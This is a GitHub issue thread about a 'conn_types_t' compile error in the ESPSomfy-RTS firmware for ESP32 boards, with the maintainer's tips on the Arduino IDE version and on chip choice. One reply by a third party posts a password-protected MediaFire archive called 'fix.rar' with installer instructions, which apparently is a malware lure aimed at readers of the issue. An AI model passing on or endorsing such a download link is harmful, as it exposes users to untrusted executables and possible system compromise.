rstrouse/ESPSomfy-RTS #461: 'conn_types_t' does not name a type

Slyfuchs, 2024-08-26:
### Hardware

ESP32-C3

### Firmware version

v2.4.6

### Application version

v2.4.6

### What happened? What did you expect to happen?

Compiling the code from scratch ( arduino ide 1.8.19) for  ESP32C3 mini. Result  error message on Network.h line 27 'conn_types_t' does not name a type. 
No matter if compiled for ESP32 Wrover module, or ESP32C3, in both cases the same error message. 

Reason why I want to compile from scratch is because I had no success transferring the firmware (SomfyController.onboard.esp32c3.bin) with esptools to the ESP32C3mini in the first place. ( I was able to transfer, but then ESP32C3 hang in a boot loop.) Guess it has to do with memory allocation. 
Transfering the provided bin code (SomfyController.ino.esp32.bin) to a standard ESP32 ( Mini D1 ESP32) was no issue at all.  
Therfore wanted to use all arduino ide and use the including download.
PS: would be great if the additional libraries mentioned would be a little more specific (e.g name of the provider). I think I have the correct ones ( based on the strings)  but I'm not really sure. A platformIO.ini would greatly be appreciated. 

Thanks in advance 

Looking forward to automate the blinds with this great software. 

### How to reproduce it (step by step)

```bash
1. Downoald code from github.
2. Extract
3. Load into arduino ide 1.8.19 
2. Add the requested librarie
smartRC-CC1101-Driver-Lib, PubSubClient, WebSockets, ArduinoJson
```

### Logs

```bash
Arduino: 1.8.19 (Linux), Board: "ESP32 Wrover Module, Default 4MB with spiffs (1.2MB APP/1.5MB SPIFFS), QIO, 80MHz, 921600, None, Disabled"

exit status 1
'conn_types_t' does not name a type
```

rstrouse, 2024-08-26:
Make sure you are compiling with v2.0.17 of the Arduino IDE.

rstrouse, 2024-08-26:
One other thing, there are a ton of C3 chips out there that have no flash memory at all according to the datasheet.  I really like the S3 mini series.  Same package size, much more power, and less silliness around the SPI flash, USB, and JTag.

mayank785, 2024-08-27:
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

LC44fun, 2025-01-22:
Hello,
same problem fo me, when compiling - errors codeversion 2.4.7:

> Multiple libraries were found for "WiFi.h"
>   Used: C:\Users\XYZ\AppData\Local\Arduino15\packages\esp32\hardware\esp32\3.1.1\libraries\WiFi
>   Not used: C:\Users\XYZ\Documents\Arduino\libraries\WiFiEspAT
> exit status 1
> 
> Compilation error: 'conn_types_t' does not name a type

I'm currently not an expert in using Arduino IDE. IDE version is 2.3.4.
What can I do?